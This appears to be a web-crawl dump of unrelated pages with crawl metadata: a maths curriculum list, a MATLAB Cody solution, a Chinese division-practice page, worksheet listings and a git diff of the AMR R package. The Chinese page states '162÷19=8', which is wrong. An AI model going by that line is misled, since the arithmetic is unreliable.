lesson the student will use DeMoivre’s theorem to find roots of complex numbers in trig form.\n221 Logarithms-Complex numbers Fundamental theorem of algebra (Stage 2)\nObjective: On completion of the lesson the student will recognise and use the fundamental theorem of algebra to find factors for polynomials with real coefficients over the complex number field.\n222 Exam Exam – Year 13\nObjective: Exam" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8503392,"math_prob":0.9722163,"size":50511,"snap":"2021-43-2021-49","text_gpt3_token_len":10608,"char_repetition_ratio":0.33878472,"word_repetition_ratio":0.343136,"special_character_ratio":0.20619272,"punctuation_ratio":0.078006,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9995684,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-28T08:23:43Z\",\"WARC-Record-ID\":\"<urn:uuid:fde9cdd3-5b94-4916-912b-854f51cc38a4>\",\"Content-Length\":\"120605\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a350434d-a936-4b49-b10d-1c8c1d4a9725>\",\"WARC-Concurrent-To\":\"<urn:uuid:79121bf0-2c4f-4c7f-9079-8a833dad8232>\",\"WARC-IP-Address\":\"35.197.225.6\",\"WARC-Target-URI\":\"https://www.futureschool.com/new-zealand-curriculum/year-13-mathematics-new-zealand/\",\"WARC-Payload-Digest\":\"sha1:GQ2V72DWJUNQNA5Y5C7A5MATFEWS3QA4\",\"WARC-Block-Digest\":\"sha1:V43N7FY2GHIYXMWREWVUP4KL2U77ETCW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588282.80_warc_CC-MAIN-20211028065732-20211028095732-00394.warc.gz\"}"}
https://kr.mathworks.com/matlabcentral/cody/problems/189-sum-all-integers-from-1-to-2-n/solutions/163673
[ "Cody\n\n# Problem 189. Sum all integers from 1 to 2^n\n\nSolution 163673\n\nSubmitted on 18 Nov 2012 by Claudio Gelmi\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\n%% x = 7; y_correct = 8256; assert(isequal(sum_int(x),y_correct))\n\nans = 8256\n\n2   Pass\n%% x = 10; y_correct = 524800; assert(isequal(sum_int(x),y_correct))\n\nans = 524800" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6522764,"math_prob":0.986138,"size":512,"snap":"2019-43-2019-47","text_gpt3_token_len":148,"char_repetition_ratio":0.16535433,"word_repetition_ratio":0.0,"special_character_ratio":0.33984375,"punctuation_ratio":0.12765957,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9910247,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-21T20:56:44Z\",\"WARC-Record-ID\":\"<urn:uuid:3424d10b-370e-44bd-9e70-aa745a57b448>\",\"Content-Length\":\"72071\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e511057f-98da-46e9-b79b-47a07fe5c025>\",\"WARC-Concurrent-To\":\"<urn:uuid:7248bd6f-59e6-4fc5-b98b-b06b5fc4fde3>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://kr.mathworks.com/matlabcentral/cody/problems/189-sum-all-integers-from-1-to-2-n/solutions/163673\",\"WARC-Payload-Digest\":\"sha1:2MO4PTJPRXZNUERLPV2SMAXHNK4T7H2D\",\"WARC-Block-Digest\":\"sha1:RVV2BWCUBZIVUE6AAIMDBSNRHO7SHRTA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670987.78_warc_CC-MAIN-20191121204227-20191121232227-00314.warc.gz\"}"}
http://ntjm.net/read/3265-b3-fd19-b5-c4-d1-e9-cb-e3-ba-cd-ca-fa-ca-bd.html
[ "# 265除19的验算和竖式\n\n589÷19=31 验算:31*19=589\n\n265÷53=5验算 53 * 5----------- 265\n\n475÷19=(380+95)÷19=380÷19+95÷19=20+5=25\n\n6.46÷19=0.34 验算:0.34 * 19 = 6.46 竖式见图:\n\n583除以19验算:30*19+13.583除以19是一个除法.没有余数的除法验算为乘法,有余数的验算需要用到乘法和加法.583÷19=30……13.竖式如下:583除以19是一个有余数的除法,验算需要计算:30*19+13.(1)先算乘法:30*19,竖式如下\n\n507*45=22815验算:265*60=15900验算:840÷35=24验算:762÷19=40…2验算:\n\n507*46=23322265*68=18020840÷35=24△762÷19=40…2验算:\n\n(1)507*46=23322(2)265*68=18020(3)840÷95=8…80(4)162÷19=8(5)695÷92=7…51(6)718÷81=8…70(7)404*58=23432(8)795÷80=9…75(9)*709*99=70191验算:(10)*569÷83=6…71验算:\n\nAll rights reserved Powered by www.ntjm.net\ncopyright ©right 2010-2021。" ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.5193665,"math_prob":0.9834573,"size":583,"snap":"2021-04-2021-17","text_gpt3_token_len":431,"char_repetition_ratio":0.101899825,"word_repetition_ratio":0.0,"special_character_ratio":0.7787307,"punctuation_ratio":0.18787879,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9952919,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-13T13:13:32Z\",\"WARC-Record-ID\":\"<urn:uuid:ddb2139b-6b96-4b3c-aa2a-a750eeafd28e>\",\"Content-Length\":\"8412\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d3f4761d-df2a-4ad7-a52a-d9298f1f88fc>\",\"WARC-Concurrent-To\":\"<urn:uuid:ba463625-2cf5-438c-b9eb-90daa432139d>\",\"WARC-IP-Address\":\"121.127.228.6\",\"WARC-Target-URI\":\"http://ntjm.net/read/3265-b3-fd19-b5-c4-d1-e9-cb-e3-ba-cd-ca-fa-ca-bd.html\",\"WARC-Payload-Digest\":\"sha1:F3UXR637UURSC5TFKELTDG3GVZXOXI5T\",\"WARC-Block-Digest\":\"sha1:OM3L5Z3PY6QZKIQGZNW5ODEDFT45FTMC\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038072366.31_warc_CC-MAIN-20210413122252-20210413152252-00028.warc.gz\"}"}
https://www.education.com/worksheets/measurement/CCSS-Math-Content-2/?page=3
[ "# Search Our Content Library\n\n85 filtered results\n85 filtered results\nMeasurement\n2nd grade\nSort by\nHow to Measure: Food\nWorksheet\nHow to Measure: Food\nCut out a colorful ruler and measure food items to practice an essential 2nd grade skill.\n2nd grade\nMath\nWorksheet\nThink and Measure #2\nWorksheet\nThink and Measure #2\nFind out the lengths of the forks and spoons on the page before measuring the forks and spoons in your own kitchen. Which utensil is the longest?\n2nd grade\nMath\nWorksheet\nHow Long Is Rapunzel's Hair?\nWorksheet\nHow Long Is Rapunzel's Hair?\nRapunzel is famous for her never-ending hair! Your child can practice basic measurements with a ruler by measuring how far down the tower her hair goes.\n1st grade\nMath\nWorksheet\nHow to Measure: Cowboy\nWorksheet\nHow to Measure: Cowboy\nCut out a colorful ruler and start practicing measuring with this cowboy picture.\n2nd grade\nMath\nWorksheet\nMeasure Length: Horse!\nWorksheet\nMeasure Length: Horse!\nBuild basic measurement skills help from Harry the Horse! Your child will practice using a ruler to measure length, a skill he'll use the rest of his life.\n2nd grade\nMath\nWorksheet\nGlossary: Many Measurement Tools\nWorksheet\nGlossary: Many Measurement Tools\nUse this glossary with the EL Support Lesson Plan: Many Measurement Tools.\n2nd grade\nMath\nWorksheet\nMeasure Length: Elephant!\nWorksheet\nMeasure Length: Elephant!\nPractice basic measurement skills with this mini elephant! This fun activity will get your child started using a ruler and help him get familiar with inches.\n2nd grade\nMath\nWorksheet\nSubtract and Compare\nWorksheet\nSubtract and Compare\nWhich is larger: an inch, a centimeter, or a paper clip? Students will practice their subtraction while building comparison skills with this math activity.\n2nd grade\nMath\nWorksheet\nMeasure Length: Shark!\nWorksheet\nMeasure Length: Shark!\nHelp a little mathematician learn about measurements with this fun, shark infested math worksheet!\n2nd grade\nMath\nWorksheet\nRounding Measurements\nWorksheet\nRounding Measurements\nOn the road to advanced math, make a stop at estimation station! This worksheet will help your child practice making \"guesstimations\" about length.\n2nd grade\nMath\nWorksheet\nHow to Measure: Dragon\nWorksheet\nHow to Measure: Dragon\nPractice measuring inches with this picture of a smiling dragon.\n2nd grade\nMath\nWorksheet\nBobby's Blueprints #3\nWorksheet\nBobby's Blueprints #3\nYour child can use her measuring know-how to get this robot's dimensions, then record them for Bobby in the column on the left.\n2nd grade\nMath\nWorksheet\nGlossary: The Language of Estimation\nWorksheet\nGlossary: The Language of Estimation\nUse this glossary with the EL Support Lesson Plan: The Language of Estimation.\n2nd grade\nMath\nWorksheet\nHow to Measure: Sea Creatures\nWorksheet\nHow to Measure: Sea Creatures\nCut out one of our colorful rulers and measure these sea creatures to answer the questions. No oxygen tank needed.\n2nd grade\nMath\nWorksheet\nMeasuring Height\nWorksheet\nMeasuring Height\nMeasuring height is an important math skill. Have your preschool practice measuring height using a ruler.\nPreschool\nMath\nWorksheet\nVocabulary Cards: Many Measurement Tools\nWorksheet\nVocabulary Cards: Many Measurement Tools\nUse these vocabulary cards with the EL Support Lesson Plan: Many Measurement Tools.\n2nd grade\nMath\nWorksheet\nCut-and-Paste Measuring Practice\nWorksheet\nCut-and-Paste Measuring Practice\nMeasure the length of these items. Your preschooler will learn the basics of measurement with this hands-on activity.\nPreschool\nMath\nWorksheet\nTree Measuring\nWorksheet\nTree Measuring\nYour child can get some practice with basic ruler measurements with this tree measuring worksheet!\n2nd grade\nMath\nWorksheet\nRuler Measurement #1\nWorksheet\nRuler Measurement #1\nKnowing how to use a ruler is an important life skill! Help your second grader measure these musical instruments, practicing with both inches and centimeters.\n2nd grade\nMath\nWorksheet\nMeasure & Draw #5\nWorksheet\nMeasure & Draw #5\nThis page challenges your child to read and use a ruler. Let's hit a home run in measurement practice!\n2nd grade\nMath\nWorksheet\nMeasuring Dimensions\nWorksheet\nMeasuring Dimensions\nIn this measuring exercise, your child can use her measuring know-how to get the signs' dimensions, then record them for Bobby.\n2nd grade\nMath\nWorksheet\nHow to Measure: People\nWorksheet\nHow to Measure: People\nUse our colorful rulers to measure these cartoon people and answer the questions, then color them in.\n2nd grade\nMath\nWorksheet\nEstimate with a Giant Sneaker\nWorksheet\nEstimate with a Giant Sneaker\nKids will get a kick out of this fun measurement activity! Use these giant sneakers during your unit on nonstandard units of length or to discuss concepts like estimation with students.\n2nd grade\nMath\nWorksheet\nVocabulary Cards: The Language of Estimation\nWorksheet\nVocabulary Cards: The Language of Estimation\nUse these vocabulary cards with the EL Support Lesson Plan: The Language of Estimation.\n2nd grade\nMath\nWorksheet\nHow to Measure: Elephant\nWorksheet\nHow to Measure: Elephant\nHelp your child practice measurements using a ruler and paper with this cute worksheet featuring an elephant and measurement questions.\n2nd grade\nMath\nWorksheet" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7838039,"math_prob":0.6521828,"size":7561,"snap":"2021-04-2021-17","text_gpt3_token_len":1822,"char_repetition_ratio":0.2302501,"word_repetition_ratio":0.21607606,"special_character_ratio":0.18225102,"punctuation_ratio":0.06937799,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9712659,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-20T08:58:07Z\",\"WARC-Record-ID\":\"<urn:uuid:209d2d39-c6b9-4590-8e94-667b1b58d902>\",\"Content-Length\":\"146610\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e36525f8-5742-42e5-b491-cc498d294dc7>\",\"WARC-Concurrent-To\":\"<urn:uuid:ed426501-7cab-4b45-b8a2-820cf0b4948e>\",\"WARC-IP-Address\":\"151.101.249.185\",\"WARC-Target-URI\":\"https://www.education.com/worksheets/measurement/CCSS-Math-Content-2/?page=3\",\"WARC-Payload-Digest\":\"sha1:M2ELDW7SOOKZYYP6MV5IXXDQRPOMAVI2\",\"WARC-Block-Digest\":\"sha1:IEOHEBWNCXW3OLFS4SEB5PPXQLQIYRJ3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618039379601.74_warc_CC-MAIN-20210420060507-20210420090507-00601.warc.gz\"}"}
https://git.webhosting.rug.nl/P281424/AMR/commit/81af41da3a0ed85a02fe70cba0ca9b0531f0676d
[ "### (v1.4.0.9041) updates based on review\n\nv1.8.2\nparent 1faa816090\ncommit 81af41da3a\n74 changed files with 710 additions and 627 deletions\n1. 6\nDESCRIPTION\n2. 11\nNEWS.md\n3. 25\nR/aa_helper_functions.R\n4. 46\nR/aa_helper_pm_functions.R\n5. 7\nR/ab.R\n6. 2\nR/ab_from_text.R\n7. 4\nR/amr.R\n8. 4\nR/catalogue_of_life.R\n9. 4\nR/data.R\n10. 11\nR/disk.R\n11. 2\nR/first_isolate.R\n12. 4\nR/g.test.R\n13. 3\nR/globals.R\n14. 2\nR/join_microorganisms.R\n15. 10\nR/mic.R\n16. 107\nR/mo.R\n17. 2\nR/mo_property.R\n18. 108\nR/mo_source.R\n19. 4\nR/proportion.R\n20. 2\nR/resistance_predict.R\n21. 46\nR/rsi.R\n22. 6\nR/rsi_calc.R\n23. 4\nR/translate.R\n24. 1\nR/zzz.R\n25. 4\ndata-raw/reproduction_of_poorman.R\n26. 2\ndocs/404.html\n27. 2\n28. 40\ndocs/articles/datasets.html\n29. 12\n30. 2\ndocs/articles/index.html\n31. 2\ndocs/authors.html\n32. 2\ndocs/index.html\n33. 19\ndocs/news/index.html\n34. 2\ndocs/pkgdown.yml\n35. 6\ndocs/reference/AMR.html\n36. 40\ndocs/reference/ab_from_text.html\n37. 44\ndocs/reference/antibiotics.html\n38. 45\ndocs/reference/as.ab.html\n39. 44\ndocs/reference/as.mo.html\n40. 40\ndocs/reference/bug_drug_combinations.html\n41. 42\ndocs/reference/catalogue_of_life.html\n42. 42\ndocs/reference/count.html\n43. 40\ndocs/reference/first_isolate.html\n44. 40\ndocs/reference/g.test.html\n45. 42\ndocs/reference/ggplot_rsi.html\n46. 2\ndocs/reference/index.html\n47. 40\ndocs/reference/join.html\n48. 40\ndocs/reference/mo_property.html\n49. 76\ndocs/reference/mo_source.html\n50. 2\ndocs/reference/plot.html\n51. 42\ndocs/reference/proportion.html\n52. 40\ndocs/reference/resistance_predict.html\n53. 40\ndocs/reference/translate.html\n54. 2\ndocs/survey.html\n55. 4\nman/AMR.Rd\n56. 2\nman/ab_from_text.Rd\n57. 4\nman/antibiotics.Rd\n58. 8\nman/as.ab.Rd\n59. 4\nman/as.mo.Rd\n60. 2\nman/bug_drug_combinations.Rd\n61. 4\nman/catalogue_of_life.Rd\n62. 4\nman/count.Rd\n63. 2\nman/first_isolate.Rd\n64. 2\nman/g.test.Rd\n65. 4\nman/ggplot_rsi.Rd\n66. 2\nman/join.Rd\n67. 2\nman/mo_property.Rd\n68. 36\nman/mo_source.Rd\n69. 4\nman/proportion.Rd\n70. 2\nman/resistance_predict.Rd\n71. 2\nman/translate.Rd\n72. 14\ntests/testthat/test-rsi.R\n73. 5\ntests/testthat/test-zzz.R\n74. 13\nvignettes/datasets.Rmd\n\n#### 6 DESCRIPTION Unescape Escape View File\n\n `@ -1,6 +1,6 @@` `Package: AMR` `Version: 1.4.0.9040` `Date: 2020-12-16` `Version: 1.4.0.9041` `Date: 2020-12-17` `Title: Antimicrobial Resistance Analysis` `Authors@R: c(` ` person(role = c(\"aut\", \"cre\"), ` `@ -47,6 +47,7 @@ Suggests:` ` ggplot2,` ` knitr,` ` microbenchmark,` ` pillar,` ` readxl,` ` rmarkdown,` ` rstudioapi,` `@ -54,6 +55,7 @@ Suggests:` ` skimr,` ` testthat,` ` tidyr,` ` tidyselect,` ` xml2` `VignetteBuilder: knitr,rmarkdown` `URL: https://msberends.github.io/AMR/, https://github.com/msberends/AMR`\n\n#### 11 NEWS.md Unescape Escape View File\n\n `@ -1,5 +1,7 @@` `# AMR 1.4.0.9040` `## Last updated: 16 December 2020` `# AMR 1.4.0.9041` `## Last updated: 17 December 2020` ``` ``` `Note: some changes in this version were suggested by anonymous reviewers from the journal we submitted our manuscript about this package to. We are those reviewers very grateful for going through our code so thoroughly!` ``` ``` `### New` `* Function `is_new_episode()` to determine patient episodes which are not necessarily based on microorganisms. It also supports grouped variables with e.g. `mutate()`, `filter()` and `summarise()` of the `dplyr` package:` `@ -26,6 +28,7 @@` ` as_tibble()` ````` `* For all function parameters in the code, it is now defined what the exact type of user input should be (inspired by the [`typed`](https://github.com/moodymudskipper/typed) package). If the user input for a certain function does not meet the requirements for a specific parameter (such as the class or length), an informative error will be thrown. This makes the package more robust and the use of it more reproducible and reliable. In total, more than 400 arguments were defined.` `* Fix for `set_mo_source()`, that previously would not remember the file location of the original file` `* Deprecated function `p_symbol()` that not really fits the scope of this package. It will be removed in a future version. See [here](https://github.com/msberends/AMR/blob/v1.4.0/R/p_symbol.R) for the source code to preserve it.` `* Better determination of disk zones and MIC values when running `as.rsi()` on a data.frame` `* Updated coagulase-negative staphylococci determination with Becker *et al.* 2020 (PMID 32056452), meaning that the species *S. argensis*, *S. caeli*, *S. debuckii*, *S. edaphicus* and *S. pseudoxylosus* are now all considered CoNS` `@ -40,14 +43,16 @@` `* Fix for plotting MIC values with `plot()`` `* Added `plot()` generic to class ``` `* LA-MRSA and CA-MRSA are now recognised as an abbreviation for *Staphylococcus aureus*, meaning that e.g. `mo_genus(\"LA-MRSA\")` will return `\"Staphylococcus\"` and `mo_is_gram_positive(\"LA-MRSA\")` will return `TRUE`.` `* Fix for using `as.rsi()` on a `data.frame` that only contains one column for antibiotic interpretations` ``` ``` `### Other` `* All messages and warnings thrown by this package now break sentences on whole words` `* More extensive unit tests` `* Internal calls to `options()` were all removed in favour of a new internal environment `mo_env`` ``` ``` `# AMR 1.4.0` ``` ``` `Note: some changes in this version were suggested by anonymous reviewers from the journal we submitted our manuscipt about this package to. We are those reviewers very grateful for going through our code so thoroughly!` `Note: some changes in this version were suggested by anonymous reviewers from the journal we submitted our manuscript about this package to. We are those reviewers very grateful for going through our code so thoroughly!` ``` ``` `### New` `* Support for 'EUCAST Expert Rules' / 'EUCAST Intrinsic Resistance and Unusual Phenotypes' version 3.2 of May 2020. With this addition to the previously implemented version 3.1 of 2016, the `eucast_rules()` function can now correct for more than 180 different antibiotics and the `mdro()` function can determine multidrug resistance based on more than 150 different antibiotics. All previously implemented versions of the EUCAST rules are now maintained and kept available in this package. The `eucast_rules()` function consequently gained the parameters `version_breakpoints` (at the moment defaults to v10.0, 2020) and `version_expertrules` (at the moment defaults to v3.2, 2020). The `example_isolates` data set now also reflects the change from v3.1 to v3.2. The `mdro()` function now accepts `guideline == \"EUCAST3.1\"` and `guideline == \"EUCAST3.2\"`.`\n\n#### 25 R/aa_helper_functions.R Unescape Escape View File\n\n `@ -101,6 +101,8 @@ check_dataset_integrity <- function() {` ` # package not yet loaded` ` require(\"AMR\")` ` })` ` stop_if(!check_microorganisms | !check_antibiotics,` ` \"the data set `microorganisms` or `antibiotics` was overwritten in your environment because another package with the same object names was loaded _after_ the AMR package, preventing the AMR package from working correctly. Please load the AMR package last.\")` ` invisible(TRUE)` `}` ``` ``` `@ -224,10 +226,11 @@ import_fn <- function(name, pkg, error_on_fail = TRUE) {` ` stop_ifnot_installed(pkg)` ` }` ` tryCatch(` ` get(name, envir = asNamespace(pkg)),` ` # don't use get() to avoid fetching non-API functions ` ` getExportedValue(name = name, ns = asNamespace(pkg)),` ` error = function(e) {` ` if (isTRUE(error_on_fail)) {` ` stop_(\"function \", name, \"() not found in package '\", pkg,` ` stop_(\"function \", name, \"() is not an exported object from package '\", pkg,` ` \"'. Please create an issue at https://github.com/msberends/AMR/issues. Many thanks!\",` ` call = FALSE)` ` } else {` `@ -239,7 +242,7 @@ import_fn <- function(name, pkg, error_on_fail = TRUE) {` `# this alternative wrapper to the message(), warning() and stop() functions:` `# - wraps text to never break lines within words` `# - ignores formatted text while wrapping` `# - adds indentation dependent on the type of message (like NOTE)` `# - adds indentation dependent on the type of message (such as NOTE)` `# - can add additional formatting functions like blue or bold text` `word_wrap <- function(...,` ` add_fn = list(), ` `@ -690,6 +693,17 @@ set_clean_class <- function(x, new_class) {` ` x` `}` ``` ``` `formatted_filesize <- function(...) {` ` size_kb <- file.size(...) / 1024` ` if (size_kb < 1) {` ` paste(round(size_kb, 1), \"kB\")` ` } else if (size_kb < 100) {` ` paste(round(size_kb, 0), \"kB\")` ` } else {` ` paste(round(size_kb / 1024, 1), \"MB\")` ` }` `}` ``` ``` `create_pillar_column <- function(x, ...) {` ` new_pillar_shaft_simple <- import_fn(\"new_pillar_shaft_simple\", \"pillar\", error_on_fail = FALSE)` ` if (!is.null(new_pillar_shaft_simple)) {` `@ -817,7 +831,7 @@ percentage <- function(x, digits = NULL, ...) {` `}` ``` ``` `# prevent dependency on package 'backports'` `# these functions were not available in previous versions of R (last checked: R 4.0.2)` `# these functions were not available in previous versions of R (last checked: R 4.0.3)` `# see here for the full list: https://github.com/r-lib/backports` `strrep <- function(x, times) {` ` x <- as.character(x)` `@ -861,3 +875,6 @@ str2lang <- function(s) {` `isNamespaceLoaded <- function(pkg) {` ` pkg %in% loadedNamespaces()` `}` `lengths = function(x, use.names = TRUE) {` ` vapply(x, length, FUN.VALUE = NA_integer_, USE.NAMES = use.names)` `}`\n\n#### 46 R/aa_helper_pm_functions.R Unescape Escape View File\n\n `@ -388,29 +388,29 @@ pm_group_size <- function(x) {` `pm_n_groups <- function(x) {` ` nrow(pm_group_data(x))` `}` `pm_group_split <- function(.data, ..., .keep = TRUE) {` ` dots_len <- ...length() > 0L` ` if (pm_has_groups(.data) && isTRUE(dots_len)) {` ` warning(\"... is ignored in pm_group_split(), please use pm_group_by(..., .add = TRUE) %pm>% pm_group_split()\")` ` }` ` if (!pm_has_groups(.data) && isTRUE(dots_len)) {` ` .data <- pm_group_by(.data, ...)` ` }` ` if (!pm_has_groups(.data) && isFALSE(dots_len)) {` ` return(list(.data))` ` }` ` pm_context\\$setup(.data)` ` on.exit(pm_context\\$clean(), add = TRUE)` ` pm_groups <- pm_get_groups(.data)` ` attr(pm_context\\$.data, \"pm_groups\") <- NULL` ` res <- pm_split_into_groups(pm_context\\$.data, pm_groups)` ` names(res) <- NULL` ` if (isFALSE(.keep)) {` ` res <- lapply(res, function(x) x[, !colnames(x) %in% pm_groups])` ` }` ` any_empty <- unlist(lapply(res, function(x) !(nrow(x) == 0L)))` ` res[any_empty]` `}` `# pm_group_split <- function(.data, ..., .keep = TRUE) {` `# dots_len <- ...length() > 0L` `# if (pm_has_groups(.data) && isTRUE(dots_len)) {` `# warning(\"... is ignored in pm_group_split(), please use pm_group_by(..., .add = TRUE) %pm>% pm_group_split()\")` `# }` `# if (!pm_has_groups(.data) && isTRUE(dots_len)) {` `# .data <- pm_group_by(.data, ...)` `# }` `# if (!pm_has_groups(.data) && isFALSE(dots_len)) {` `# return(list(.data))` `# }` `# pm_context\\$setup(.data)` `# on.exit(pm_context\\$clean(), add = TRUE)` `# pm_groups <- pm_get_groups(.data)` `# attr(pm_context\\$.data, \"pm_groups\") <- NULL` `# res <- pm_split_into_groups(pm_context\\$.data, pm_groups)` `# names(res) <- NULL` `# if (isFALSE(.keep)) {` `# res <- lapply(res, function(x) x[, !colnames(x) %in% pm_groups])` `# }` `# any_empty <- unlist(lapply(res, function(x) !(nrow(x) == 0L)))` `# res[any_empty]` `# }` ``` ``` `pm_group_keys <- function(.data) {` ` pm_groups <- pm_get_groups(.data)`\n\n#### 7 R/ab.R Unescape Escape View File\n\n `@ -37,13 +37,14 @@` `#' ` `#' All these properties will be searched for the user input. The [as.ab()] can correct for different forms of misspelling:` `#' ` `#' * Wrong spelling of drug names (like \"tobramicin\" or \"gentamycin\"), which corrects for most audible similarities such as f/ph, x/ks, c/z/s, t/th, etc.` `#' * Wrong spelling of drug names (such as \"tobramicin\" or \"gentamycin\"), which corrects for most audible similarities such as f/ph, x/ks, c/z/s, t/th, etc.` `#' * Too few or too many vowels or consonants` `#' * Switching two characters (like \"mreopenem\", often the case in clinical data, when doctors typed too fast)` `#' * Switching two characters (such as \"mreopenem\", often the case in clinical data, when doctors typed too fast)` `#' * Digitalised paper records, leaving artefacts like 0/o/O (zero and O's), B/8, n/r, etc.` `#'` `#' Use the [ab_property()] functions to get properties based on the returned antibiotic ID, see Examples.` `#' Use the [`ab_*`][ab_property()] functions to get properties based on the returned antibiotic ID, see Examples.` `#' ` `#' Note: the [as.ab()] and [`ab_*`][ab_property()] functions may use very long regular expression to match brand names of antimicrobial agents. This may fail on some systems.` `#' @section Source:` `#' World Health Organization (WHO) Collaborating Centre for Drug Statistics Methodology: \\url{https://www.whocc.no/atc_ddd_index/}` `#'`\n\n#### 2 R/ab_from_text.R Unescape Escape View File\n\n `@ -46,7 +46,7 @@` `#' Without using `collapse`, this function will return a [list]. This can be convenient to use e.g. inside a `mutate()`):\\cr` `#' `df %>% mutate(abx = ab_from_text(clinical_text))` ` `#' ` `#' The returned AB codes can be transformed to official names, groups, etc. with all [ab_property()] functions like [ab_name()] and [ab_group()], or by using the `translate_ab` parameter.` `#' The returned AB codes can be transformed to official names, groups, etc. with all [`ab_*`][ab_property()] functions such as [ab_name()] and [ab_group()], or by using the `translate_ab` parameter.` `#' ` `#' With using `collapse`, this function will return a [character]:\\cr` `#' `df %>% mutate(abx = ab_from_text(clinical_text, collapse = \"|\"))` `\n\n#### 4 R/amr.R Unescape Escape View File\n\n `@ -42,8 +42,8 @@` `#' - Determining multi-drug resistance (MDR) / multi-drug resistant organisms (MDRO)` `#' - Calculating (empirical) susceptibility of both mono therapy and combination therapies` `#' - Predicting future antimicrobial resistance using regression models` `#' - Getting properties for any microorganism (like Gram stain, species, genus or family)` `#' - Getting properties for any antibiotic (like name, code of EARS-Net/ATC/LOINC/PubChem, defined daily dose or trade name)` `#' - Getting properties for any microorganism (such as Gram stain, species, genus or family)` `#' - Getting properties for any antibiotic (such as name, code of EARS-Net/ATC/LOINC/PubChem, defined daily dose or trade name)` `#' - Plotting antimicrobial resistance` `#' - Applying EUCAST expert rules` `#' - Getting SNOMED codes of a microorganism, or getting properties of a microorganism based on a SNOMED code`\n\n#### 4 R/catalogue_of_life.R Unescape Escape View File\n\n `@ -50,8 +50,8 @@ format_included_data_number <- function(data) {` `#' @section Included taxa:` `#' Included are:` `#' - All `r format_included_data_number(microorganisms[which(microorganisms\\$kingdom %in% c(\"Archeae\", \"Bacteria\", \"Chromista\", \"Protozoa\")), ])` (sub)species from the kingdoms of Archaea, Bacteria, Chromista and Protozoa` `#' - All `r format_included_data_number(microorganisms[which(microorganisms\\$kingdom == \"Fungi\" & microorganisms\\$order %in% c(\"Eurotiales\", \"Microascales\", \"Mucorales\", \"Onygenales\", \"Pneumocystales\", \"Saccharomycetales\", \"Schizosaccharomycetales\", \"Tremellales\")), ])` (sub)species from these orders of the kingdom of Fungi: Eurotiales, Microascales, Mucorales, Onygenales, Pneumocystales, Saccharomycetales, Schizosaccharomycetales and Tremellales, as well as `r format_included_data_number(microorganisms[which(microorganisms\\$kingdom == \"Fungi\" & !microorganisms\\$order %in% c(\"Eurotiales\", \"Microascales\", \"Mucorales\", \"Onygenales\", \"Pneumocystales\", \"Saccharomycetales\", \"Schizosaccharomycetales\", \"Tremellales\")), ])` other fungal (sub)species. The kingdom of Fungi is a very large taxon with almost 300,000 different (sub)species, of which most are not microbial (but rather macroscopic, like mushrooms). Because of this, not all fungi fit the scope of this package and including everything would tremendously slow down our algorithms too. By only including the aforementioned taxonomic orders, the most relevant fungi are covered (like all species of *Aspergillus*, *Candida*, *Cryptococcus*, *Histplasma*, *Pneumocystis*, *Saccharomyces* and *Trichophyton*).` `#' - All `r format_included_data_number(microorganisms[which(microorganisms\\$kingdom == \"Animalia\"), ])` (sub)species from `r format_included_data_number(microorganisms[which(microorganisms\\$kingdom == \"Animalia\"), \"genus\"])` other relevant genera from the kingdom of Animalia (like *Strongyloides* and *Taenia*)` `#' - All `r format_included_data_number(microorganisms[which(microorganisms\\$kingdom == \"Fungi\" & microorganisms\\$order %in% c(\"Eurotiales\", \"Microascales\", \"Mucorales\", \"Onygenales\", \"Pneumocystales\", \"Saccharomycetales\", \"Schizosaccharomycetales\", \"Tremellales\")), ])` (sub)species from these orders of the kingdom of Fungi: Eurotiales, Microascales, Mucorales, Onygenales, Pneumocystales, Saccharomycetales, Schizosaccharomycetales and Tremellales, as well as `r format_included_data_number(microorganisms[which(microorganisms\\$kingdom == \"Fungi\" & !microorganisms\\$order %in% c(\"Eurotiales\", \"Microascales\", \"Mucorales\", \"Onygenales\", \"Pneumocystales\", \"Saccharomycetales\", \"Schizosaccharomycetales\", \"Tremellales\")), ])` other fungal (sub)species. The kingdom of Fungi is a very large taxon with almost 300,000 different (sub)species, of which most are not microbial (but rather macroscopic, like mushrooms). Because of this, not all fungi fit the scope of this package and including everything would tremendously slow down our algorithms too. By only including the aforementioned taxonomic orders, the most relevant fungi are covered (such as all species of *Aspergillus*, *Candida*, *Cryptococcus*, *Histplasma*, *Pneumocystis*, *Saccharomyces* and *Trichophyton*).` 